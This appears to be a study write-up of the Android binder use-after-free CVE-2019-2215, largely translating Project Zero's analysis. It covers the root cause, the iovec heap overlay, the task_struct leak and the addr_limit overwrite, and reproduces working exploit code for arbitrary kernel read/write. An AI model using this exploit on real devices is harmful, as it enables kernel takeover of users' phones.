I recently found some time to dig into the exploitation details of CVE-2019-2215, so I am writing them down here: partly to make it easy to revisit later, and partly because writing out my own understanding is itself a way of learning.

What I write here can be seen as a translation of the Google Project Zero write-up with some thoughts of my own added. I still recommend reading the original post (linked here), because the other analyses I came across were all somewhat vague in places and none were as detailed as the P0 article, which is also why I wanted to write my own analysis.

1. Root Cause

From the corresponding issue page and the kernel patch (note that the commit message is not entirely accurate), the root cause of CVE-2019-2215 is that when the binder driver receives the BINDER_THREAD_EXIT ioctl, the function responsible for releasing the corresponding binder_thread does not check whether that binder_thread is still referenced by epoll before freeing it. As a result, a binder_thread that is still referenced by epoll leaves a dangling pointer behind in epoll after it is freed. When epoll later tries, for whatever reason, to remove the waitqueue inside the already-freed binder_thread, undefined behavior follows, e.g. a crash (once the memory that held the freed binder_thread has been handed out to, and overwritten by, some other object).
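For context, here is a heavily abridged sketch of the relevant poll path, based on my reading of the 4.4-era binder driver (locking, error handling and version-specific details are omitted, so treat it as an outline rather than the exact code): binder_poll registers the per-thread waitqueue &thread->wait with epoll via poll_wait, and BINDER_THREAD_EXIT later frees that binder_thread without undoing the registration.

static unsigned int binder_poll(struct file *filp,
                                struct poll_table_struct *wait)
{
        struct binder_proc *proc = filp->private_data;
        struct binder_thread *thread;

        thread = binder_get_thread(proc);       /* per-thread bookkeeping object */
        /* ... */
        /* epoll stores a pointer to thread->wait here; nothing removes it when
         * the thread is later destroyed via BINDER_THREAD_EXIT */
        poll_wait(filp, &thread->wait, wait);
        /* ... */
        return 0;
}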

The crash can be triggered with the following PoC on the affected kernel built with KASAN:

#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul

int main()
{
        int fd, epfd;
        struct epoll_event event = { .events = EPOLLIN };

        fd = open("/dev/binder0", O_RDONLY);
        epfd = epoll_create(1000);
        epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
        ioctl(fd, BINDER_THREAD_EXIT, NULL);
}

The overall trigger sequence is shown in the figure below:

[Figure: binder poll crash trigger flow]

As shown, the ioctl first frees the binder_thread; when the program then exits, epoll's waitqueue removal runs and triggers the crash. Running this on the unpatched kernel (built with KASAN) in a VM produces the following call stack:

[Figure: KASAN report]

From the report we can see that the crash is triggered inside remove_wait_queue: ep_remove_wait_queue calls remove_wait_queue, and remove_wait_queue calls spin_lock_irqsave.

static void ep_remove_wait_queue(struct eppoll_entry *pwq)
{
        wait_queue_head_t *whead;

        rcu_read_lock();
        /*
        * If it is cleared by POLLFREE, it should be rcu-safe.
        * If we read NULL we need a barrier paired with
        * smp_store_release() in ep_poll_callback(), otherwise
        * we rely on whead->lock.
        */
        whead = smp_load_acquire(&pwq->whead);
        if (whead)
                remove_wait_queue(whead, &pwq->wait);
        rcu_read_unlock();
}

void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
        unsigned long flags;

        spin_lock_irqsave(&wq_head->lock, flags);
        __remove_wait_queue(wq_head, wq_entry);
        spin_unlock_irqrestore(&wq_head->lock, flags);
}
EXPORT_SYMBOL(remove_wait_queue);

[Figure: crash log with added printk]

By analyzing the log at crash time (I added my own printk calls in the binder_thread release path and in ep_remove_wait_queue), we can see that the binder_thread object involved in the crash is at 0xffff888046070008, and the last eppoll_entry freed before the crash is at 0xffff88803ab6e6a8. To verify how the two relate once the fd backing the binder_thread has been added to epoll, we can debug the kernel with kgdb; I will not go into how the kernel was built for debugging and will just show the variables printed in the debugger.

[Figure: kgdb output]

The output shows that eppoll_entry.whead in the crash log above is exactly binder_thread.wait. So we can now be sure that the whead variable in ep_remove_wait_queue, i.e. the wq_head argument of remove_wait_queue, is the wait field of the already-freed binder_thread. Dereferencing wait->lock therefore touches freed memory, and KASAN reports the bug as soon as spin_lock_irqsave tries to write to wait->lock.

Digging further into spin_lock_irqsave, it eventually calls _raw_spin_lock_irqsave; its disassembly is shown below, and the KASAN instrumentation is visible there. I will not expand on this further.

[Figure: _raw_spin_lock_irqsave disassembly]

Note that if the lock value itself is non-zero, execution hangs right here and the subsequent __remove_wait_queue is never reached. So when building the exploit later, we must make sure that binder_thread.wait.lock reads as 0.

2. Exploit

As analyzed in the Root Cause section, KASAN catches the bug because the binder_thread has been freed, so the memory that wait points into carries KASAN's poison marking. Without KASAN, epoll's removal path keeps going and eventually reaches __list_del. As the P0 post also notes, if CONFIG_DEBUG_LIST is enabled a different code path with many checks is taken and there is no exploitation opportunity; here we only consider the case where that option is disabled.

static inline void
__remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
        list_del(&wq_entry->entry);
}


#ifndef CONFIG_DEBUG_LIST
...
static inline void list_del(struct list_head *entry)
{
        __list_del(entry->prev, entry->next);
        entry->next = LIST_POISON1;
        entry->prev = LIST_POISON2;
}

static inline void __list_del(struct list_head * prev, struct list_head * next)
{
        next->prev = prev;
        WRITE_ONCE(prev->next, next);
}

The entry being deleted here is eppoll_entry.wait; as the comments in the structure below explain, it is the wait queue item linked onto the target file's wait queue head, i.e. an item on the list headed by binder_thread.wait.

/* Wait structure used by the poll hooks */
struct eppoll_entry {
        /* List header used to link this structure to the "struct epitem" */
        struct list_head llink;

        /* The "base" pointer is set to the container "struct epitem" */
        struct epitem *base;

        /*
        * Wait queue item that will be linked to the target file wait
        * queue head.
        */
        wait_queue_t wait;

        /* The wait queue head that linked the "wait" wait queue item */
        wait_queue_head_t *whead;
};

So when execution finally reaches __list_del, by placing a crafted fake binder_thread at the address of the freed one, the unlink operation next->prev = prev can be used both to leak memory contents and to modify critical data.
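To see exactly what the unlink writes in our situation, here is a small user-space illustration of my own (not kernel code): the eppoll_entry's wait entry is the only element on the list, so its next and prev both point back at the head that overlaps the freed binder_thread, and after the deletion both fields of the head point at the head itself.

#include <stdio.h>

struct list_head { struct list_head *next, *prev; };

/* same logic as the kernel's __list_del / list_del, minus WRITE_ONCE and poisoning */
static void fake_list_del(struct list_head *entry)
{
        struct list_head *prev = entry->prev, *next = entry->next;
        next->prev = prev;
        prev->next = next;
}

int main(void)
{
        struct list_head head;        /* stands in for binder_thread.wait's list head */
        struct list_head only_entry;  /* stands in for eppoll_entry.wait's list entry */

        head.next = head.prev = &only_entry;
        only_entry.next = only_entry.prev = &head;

        fake_list_del(&only_entry);

        /* both fields of the head now hold the address of the head itself */
        printf("&head=%p next=%p prev=%p\n", (void *)&head, (void *)head.next, (void *)head.prev);
        return 0;
}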

2.1 Preparing

Heap shaping in the kernel requires a solid understanding of the structure we want to overlap, so let's first look at the definition of binder_thread.

/**
 * struct binder_thread - binder thread bookkeeping
 * @proc:                 binder process for this thread
 *                        (invariant after initialization)
 * @rb_node:              element for proc->threads rbtree
 *                        (protected by @proc->inner_lock)
 * @waiting_thread_node:  element for @proc->waiting_threads list
 *                        (protected by @proc->inner_lock)
 * @pid:                  PID for this thread
 *                        (invariant after initialization)
 * @looper:               bitmap of looping state
 *                        (only accessed by this thread)
 * @looper_needs_return:  looping thread needs to exit driver
 *                        (no lock needed)
 * @transaction_stack:    stack of in-progress transactions for this thread
 *                        (protected by @proc->inner_lock)
 * @todo:                 list of work to do for this thread
 *                        (protected by @proc->inner_lock)
 * @process_todo:         whether work in @todo should be processed
 *                        (protected by @proc->inner_lock)
 * @return_error:         transaction errors reported by this thread
 *                        (only accessed by this thread)
 * @reply_error:          transaction errors reported by target thread
 *                        (protected by @proc->inner_lock)
 * @wait:                 wait queue for thread work
 * @stats:                per-thread statistics
 *                        (atomics, no lock needed)
 * @tmp_ref:              temporary reference to indicate thread is in use
 *                        (atomic since @proc->inner_lock cannot
 *                        always be acquired)
 * @is_dead:              thread is dead and awaiting free
 *                        when outstanding transactions are cleaned up
 *                        (protected by @proc->inner_lock)
 * @task:                 struct task_struct for this thread
 *
 * Bookkeeping structure for binder threads.
 */
struct binder_thread {
        struct binder_proc *proc;
        struct rb_node rb_node;
        struct list_head waiting_thread_node;
        int pid;
        int looper;              /* only modified by this thread */
        bool looper_need_return; /* can be written by other thread */
        struct binder_transaction *transaction_stack;
        struct list_head todo;
        bool process_todo;
        struct binder_error return_error;
        struct binder_error reply_error;
        wait_queue_head_t wait;
        struct binder_stats stats;
        atomic_t tmp_ref;
        bool is_dead;
        struct task_struct *task;
};

What matters here is the overall size of binder_thread and the offsets of wait and task, because the plan is to get a kernel object of similar size to reuse the same memory, use the list removal on wait to read out the value of task, and then use the unlink once more to overwrite addr_limit. From debugging, the size of binder_thread is 0x198, the offset of wait is 0xA0, and the offset of task is 0x190.

[Figure: binder_thread size and offsets]

2.2 Choosing a Kernel Object

To successfully reclaim the memory region freed by the binder_thread, we need a kernel structure or object of similar size; the one chosen here is struct iovec.

// sizeof(iovec) = 0x10
struct iovec
{
        void __user *iov_base;
        __kernel_size_t iov_len;
};

With writev and readv, data stored in non-contiguous memory blocks (described by an iovec[] array) can be written to a given stream, or data read from a stream can be scattered into such blocks; iov_base gives the address of each block and iov_len its size.

The nice thing about iovec is that both iov_base and iov_len are controllable: as long as the user-space check on iov_base performed when the array is passed into the kernel is passed once, any later modification of iov_base is no longer required to point at a user-space address.
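As a quick illustration of that scatter/gather behavior (a minimal user-space example of my own, not part of the exploit), writev simply walks the array in order and copies iov_len bytes from each iov_base:

#include <stdio.h>
#include <string.h>
#include <sys/uio.h>
#include <unistd.h>

int main(void)
{
        char a[] = "hello ", b[] = "iovec\n";
        struct iovec iov[2] = {
                { .iov_base = a, .iov_len = strlen(a) },
                { .iov_base = b, .iov_len = strlen(b) },
        };

        /* gathers both blocks into a single write to stdout */
        ssize_t n = writev(STDOUT_FILENO, iov, 2);
        printf("wrote %zd bytes\n", n);
        return 0;
}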

struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
        /*
        * For reasons of header soup (see current_thread_info()), this
        * must be the first element of task_struct.
        */
        struct thread_info      thread_info;
        #endif
        /* -1 unrunnable, 0 runnable, >0 stopped: */
        volatile long           state;
        ...
};

struct thread_info {
        unsigned long   flags;          /* low level flags */
        mm_segment_t    addr_limit;     /* address limit */
        #ifdef CONFIG_ARM64_SW_TTBR0_PAN
        u64             ttbr0;          /* saved TTBR0_EL1 */
        #endif
        int             preempt_count;  /* 0 => preemptable, <0 => bug */
        ...
};

The offset of addr_limit depends on the machine architecture; the definitions shown above are the arm64 ones. The first field of task_struct is thread_info, and addr_limit sits at offset 0x8 inside thread_info, so once we have the address of task_struct, addr_limit lives at offset 0x8 from it.

2.3 Leaking task_struct

At this point we have a rough picture of the target structure, the checks that need to be bypassed, and where exactly the unlink will be abused:

  • binder_thread is 0x198 bytes in size
    • wait is at offset 0xA0
      • wait.lock must read as 0, otherwise execution never reaches the unlink
    • task is at offset 0x190
      • we want to leak the freed binder_thread's task value, so the overlapping object must not cover anything at offset 0x190 or beyond
  • on arm64, addr_limit sits at offset 0x8 of task_struct
  • iovec is 0x10 bytes in size
    • iovec.iov_base must point to a user-space address, otherwise the check performed when the array is passed into the kernel fails

So, to have a good chance of the kernel reusing the memory freed by the binder_thread, we prepare an iovec array of similar size; and since we must not clobber the task field of the binder_thread we want to leak, we need 0x190 / 0x10 = 0x19, i.e. 25 entries, giving iovec[25]. To drive the unlink through wait, the entry at index 0xA0 / 0x10 = 10 has to hold data that is both valid and carefully constructed. The P0 blog's figure of the memory correspondence is borrowed here:

[Figure: iovec overlay for leaking task_struct]

With the rough correspondence in place, the contents of the relevant slots must also satisfy the following:

  • wait.lock must read as 0x0
  • iovec.iov_base must point to a user-space address
  • after the unlink, wait.task_list.next and wait.task_list.prev both point back at wait.task_list itself

To meet these requirements, the P0 exploit fills the key slots with the following data:

[Figure: heap layout for leaking task_struct]

The relevant code:

#define BINDER_THREAD_EXIT 0x40046208ul
// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
#define BINDER_THREAD_SZ 0x190
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25
#define WAITQUEUE_OFFSET 0xA0
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10

// Alloc a userspace memory which will satisfy wait.lock == 0
// and iovec.base point to userspace
dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);

// Forming iovec[25]
struct iovec iovec_array[IOVEC_ARRAY_SZ];
memset(iovec_array, 0, sizeof(iovec_array));

iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

int b;

int pipefd[2];
if (pipe(pipefd)) err(1, "pipe");
if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size");
static char page_buffer[0x1000];

iovec[0] through iovec[9] are all zero; entries whose iov_base and iov_len are both 0x0 are simply skipped during the write and the read. iovec[10] (overlapping wait.lock and wait.task_list.next) and iovec[11] (overlapping wait.task_list.prev) carry the crafted values: to make wait.lock (32-bit) read as 0x0 while iov_base still points into user space, we map a user-space block whose address has all of its low 32 bits zero; the P0 exploit maps it at 0x100000000UL, which satisfies both requirements at once.

As analyzed earlier, when the unlink fires, binder_thread.wait is the list head (this is what eppoll_entry.whead points at) and the element being removed is eppoll_entry.wait. That element is the only one on the list, so after the removal only the head itself remains, with its next and prev both pointing at itself. P0's illustration:

[Figure: the list before and after list_del]

Before the unlink:

eppoll_entry.whead->next = 0x1000;
eppoll_entry.whead->prev = 0xDEADBEEF;

eppoll_entry.wait->next = eppoll_entry.whead;
eppoll_entry.wait->prev = eppoll_entry.whead;

At unlink time, per the list_del code:

static inline void list_del(struct list_head *entry)
{
        __list_del(entry->prev, entry->next);
        entry->next = LIST_POISON1;
        entry->prev = LIST_POISON2;
}

// Here both prev and next point at whead (the head itself).
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
        next->prev = prev;
        WRITE_ONCE(prev->next, next);
}

After the unlink completes, the memory layout looks like this:

[Figure: layout after the unlink in the task_struct leak]

Note that before the unlink is triggered, the parent process first blocks the pipe with writev (the pipe buffer was set to 0x1000 earlier):

ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);

  • Before the unlink, the parent's writev consumes iovec[10]: it writes 0x1000 bytes from the dummy_page_4g_aligned block into the pipe, filling it, and then blocks on the next entry.
  • The child then triggers the unlink, which rewrites the kernel copy of iovec[11].iov_base into a pointer to iovec[10].iov_len (i.e. into the freed binder_thread at offset 0xA8); the child then read()s the 0x1000 bytes of dummy_page_4g_aligned data back out of the pipe.
  • That unblocks the parent's writev, which moves on to iovec[11]: its iov_base now points at binder_thread.wait.task_list, so the next 0x1000 bytes pushed into the pipe come from the freed binder_thread, and the parent read()s them into the buffer.
  • buffer + 0xE8 then holds the task pointer, i.e. the address of the current process's task_struct (wait is at offset 0xA0, task at 0x190, and wait.task_list sits at wait + 0x8, so the distance is 0x190 - 0xA0 - 0x8 = 0xE8).
struct list_head {
        struct list_head *next, *prev;
};

struct wait_queue_head {
        spinlock_t              lock; // 8 Bytes
        struct list_head        head;
};
typedef struct wait_queue_head wait_queue_head_t;

// on arm64, spinlock_t ultimately reduces to the arch_spinlock_t below; with the padding before the following list_head it occupies 8 bytes in the layout
typedef struct {
#ifdef __AARCH64EB__
        u16 next;
        u16 owner;
#else
        u16 owner;
        u16 next;
#endif
} __aligned(4) arch_spinlock_t;

[Figure: offset of the list head inside wait_queue_head]


The key exploit code around the unlink:

pid_t fork_ret = fork();
if (fork_ret == -1) err(1, "fork");
if (fork_ret == 0){
  /* Child process */
  prctl(PR_SET_PDEATHSIG, SIGKILL);
  sleep(2);
  printf("CHILD: Doing EPOLL_CTL_DEL.\n");
  epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
  printf("CHILD: Finished EPOLL_CTL_DEL.\n");
  // first page: dummy data
  if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
  close(pipefd[1]);
  printf("CHILD: Finished write to FIFO.\n");

  exit(0);
}
//printf("PARENT: Calling READV\n");
ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
printf("writev() returns 0x%x\n", (unsigned int)b);
// second page: leaked data
if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
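Once the parent's second read() returns, the full PoC (see section 2.5) waits for the child and pulls the leaked task_struct pointer straight out of the page buffer:

printf("PARENT: Finished calling READV\n");
int status;
if (wait(&status) != fork_ret) err(1, "wait");

current_ptr = *(unsigned long *)(page_buffer + 0xe8);
printf("current_ptr == 0x%lx\n", current_ptr);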

2.4 Overwrite addr_limit

With the process's task_struct address in hand, the next step reuses essentially the same iovec[25] layout to overwrite addr_limit. The difference from the task_struct leak is that this time recvmsg is used instead of writev to consume iovec[25]: it blocks waiting for data until the child's write delivers the payload that corrupts addr_limit.

Using a socket pair, the kernel can be made to walk an iovec array in just the same way:

struct msghdr msg = {
        .msg_iov = iovec_array,
        .msg_iovlen = IOVEC_ARRAY_SZ
};

All we need to do is prepare this msghdr and then block in recvmsg, waiting for data to be written into iovec[25]:

int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);

Now look at the memory layout used before this unlink:

struct iovec iovec_array[IOVEC_ARRAY_SZ];
memset(iovec_array, 0, sizeof(iovec_array));

// Unlink Layout
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

[Figure: secondary iovec layout]

This layout differs slightly from the previous one:

  • iovec[10].iov_len = 1: right after the socketpair is created, a single dummy byte is written into the socket; recvmsg consumes it into the memory pointed to by dummy_page_4g_aligned, so the child's next write starts landing in the block pointed to by iovec[11].iov_base.
int socks[2];
if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair");
if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte");

Next, trigger the unlink bug:

pid_t fork_ret = fork();
if (fork_ret == -1) err(1, "fork");
if (fork_ret == 0){
        /* Child process */
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        sleep(2);
        printf("CHILD: Doing EPOLL_CTL_DEL.\n");
        epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
        printf("CHILD: Finished EPOLL_CTL_DEL.\n");
        // write second_chunk
        if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
                err(1, "write second chunk to socket");
        exit(0);
}
ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
struct msghdr msg = {
        .msg_iov = iovec_array,
        .msg_iovlen = IOVEC_ARRAY_SZ
};
int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);

[Figure: overwriting addr_limit]

Here I borrow the figure from the P0 blog. The left half is the memory layout right after the unlink: as before, the unlink rewrites iovec[10].iov_len and iovec[11].iov_base, making iovec[11].iov_base point at iovec[10].iov_len. The right half is the key part of this stage; it shows the state after

if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
        err(1, "write second chunk to socket");

has run, i.e. after second_write_chunk has been delivered into the freed binder_thread through the blocked recvmsg.

unsigned long second_write_chunk[] = {
        1, /* iov_len (already used) */
        0xdeadbeef, /* iov_base (already used) */
        0x8 + 2 * 0x10, /* iov_len (already used) */
        current_ptr + 0x8, /* next iov_base (addr_limit) */
        8, /* next iov_len (sizeof(addr_limit)) */
        0xfffffffffffffffe /* value to write - new addr_limit */
};

At this point the data written by the child is copied, by the resumed recvmsg, starting at the memory iovec[11].iov_base points to, 0x28 bytes of it in total. Since iovec[11].iov_base now points at the memory holding iovec[10].iov_len, i.e. at binder_thread + 0xA8, the values in second_write_chunk are written there one after another starting from offset 0xA8, leaving the kernel-side iovec entries as:

iovec[10].iov_len = 1;
iovec[11].iov_base = 0xdeadbeef;
iovec[11].iov_len = 0x28;
iovec[12].iov_base = current_ptr + 0x8;
iovec[12].iov_len = 0x8;

That is exactly 0x28 bytes of data, and current_ptr is the address we obtained from the first-stage task_struct leak, so iovec[12].iov_base now points at the memory holding addr_limit. By this point the memory behind iovec[11].iov_base (the 0x28 bytes starting at iovec[10].iov_len) has been fully written, so the remaining data is copied into the memory iovec[12].iov_base points to, i.e. the memory storing addr_limit; in effect:

// current_ptr + 0x8 points to task_struct.thread_info.addr_limit
*(current_ptr + 0x8) = 0xfffffffffffffffe;

At this point addr_limit has been successfully overwritten, and arbitrary kernel memory can be read and written afterwards.
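To show what that buys us: with addr_limit now covering the whole address space, the access_ok checks in copy_from_user/copy_to_user no longer reject kernel addresses, so the full PoC below turns an ordinary pipe into a stable kernel read/write primitive. Abridged here from its kernel_write/kernel_read helpers (length checks and errno handling dropped):

int kernel_rw_pipe[2];  /* created with pipe(kernel_rw_pipe) in main() */

void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {
  /* user buffer -> pipe -> kernel address */
  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");
  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");
}

void kernel_read(unsigned long kaddr, void *buf, unsigned long len) {
  /* kernel address -> pipe -> user buffer */
  if (write(kernel_rw_pipe[1], (void*)kaddr, len) != len) err(1, "kernel_read failed to read kernel memory");
  if (read(kernel_rw_pipe[0], buf, len) != len) err(1, "kernel_read failed to write out to userspace");
}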

2.5 Full PoC

The complete PoC published by P0 is reproduced here for easy reference.

/*
 * POC to gain arbitrary kernel R/W access using CVE-2019-2215
 * https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
 *
 * Jann Horn & Maddie Stone of Google Project Zero
 *
 * 3 October 2019
*/

#define _GNU_SOURCE
#include <stdbool.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <ctype.h>
#include <sys/uio.h>
#include <err.h>
#include <sched.h>
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sched.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <errno.h>

#define BINDER_THREAD_EXIT 0x40046208ul
// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
#define BINDER_THREAD_SZ 0x190
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25
#define WAITQUEUE_OFFSET 0xA0
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10

void hexdump_memory(unsigned char *buf, size_t byte_count) {
  unsigned long byte_offset_start = 0;
  if (byte_count % 16)
    errx(1, "hexdump_memory called with non-full line");
  for (unsigned long byte_offset = byte_offset_start; byte_offset < byte_offset_start + byte_count;
          byte_offset += 16) {
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      linep += sprintf(linep, "%02hhx ", (unsigned char)buf[byte_offset + i]);
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<16; i++) {
      char c = buf[byte_offset + i];
      if (isalnum(c) || ispunct(c) || c == ' ') {
        *(linep++) = c;
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

int epfd;

void *dummy_page_4g_aligned;
unsigned long current_ptr;
int binder_fd;

void leak_task_struct(void)
{
  struct epoll_event event = { .events = EPOLLIN };
  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");

  struct iovec iovec_array[IOVEC_ARRAY_SZ];
  memset(iovec_array, 0, sizeof(iovec_array));

  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

  int b;

  int pipefd[2];
  if (pipe(pipefd)) err(1, "pipe");
  if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size");
  static char page_buffer[0x1000];
  //if (write(pipefd[1], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "fill pipe");

  pid_t fork_ret = fork();
  if (fork_ret == -1) err(1, "fork");
  if (fork_ret == 0){
    /* Child process */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);
    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
    // first page: dummy data
    if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
    close(pipefd[1]);
    printf("CHILD: Finished write to FIFO.\n");

    exit(0);
  }
  //printf("PARENT: Calling READV\n");
  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
  b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
  printf("writev() returns 0x%x\n", (unsigned int)b);
  // second page: leaked data
  if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
  //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer));

  printf("PARENT: Finished calling READV\n");
  int status;
  if (wait(&status) != fork_ret) err(1, "wait");

  current_ptr = *(unsigned long *)(page_buffer + 0xe8);
  printf("current_ptr == 0x%lx\n", current_ptr);
}

void clobber_addr_limit(void)
{
  struct epoll_event event = { .events = EPOLLIN };
  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");

  struct iovec iovec_array[IOVEC_ARRAY_SZ];
  memset(iovec_array, 0, sizeof(iovec_array));

  unsigned long second_write_chunk[] = {
    1, /* iov_len */
    0xdeadbeef, /* iov_base (already used) */
    0x8 + 2 * 0x10, /* iov_len (already used) */
    current_ptr + 0x8, /* next iov_base (addr_limit) */
    8, /* next iov_len (sizeof(addr_limit)) */
    0xfffffffffffffffe /* value to write */
  };

  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair");
  if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte");

  pid_t fork_ret = fork();
  if (fork_ret == -1) err(1, "fork");
  if (fork_ret == 0){
    /* Child process */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);
    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
    if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
      err(1, "write second chunk to socket");
    exit(0);
  }
  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
  struct msghdr msg = {
    .msg_iov = iovec_array,
    .msg_iovlen = IOVEC_ARRAY_SZ
  };
  int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);
  printf("recvmsg() returns %d, expected %lu\n", recvmsg_result,
      (unsigned long)(iovec_array[IOVEC_INDX_FOR_WQ].iov_len +
      iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len +
      iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len));
}

int kernel_rw_pipe[2];
void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {
  errno = 0;
  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");
  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");
}
void kernel_read(unsigned long kaddr, void *buf, unsigned long len) {
  errno = 0;
  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
  if (write(kernel_rw_pipe[1], (void*)kaddr, len) != len) err(1, "kernel_read failed to read kernel memory");
  if (read(kernel_rw_pipe[0], buf, len) != len) err(1, "kernel_read failed to write out to userspace");
}
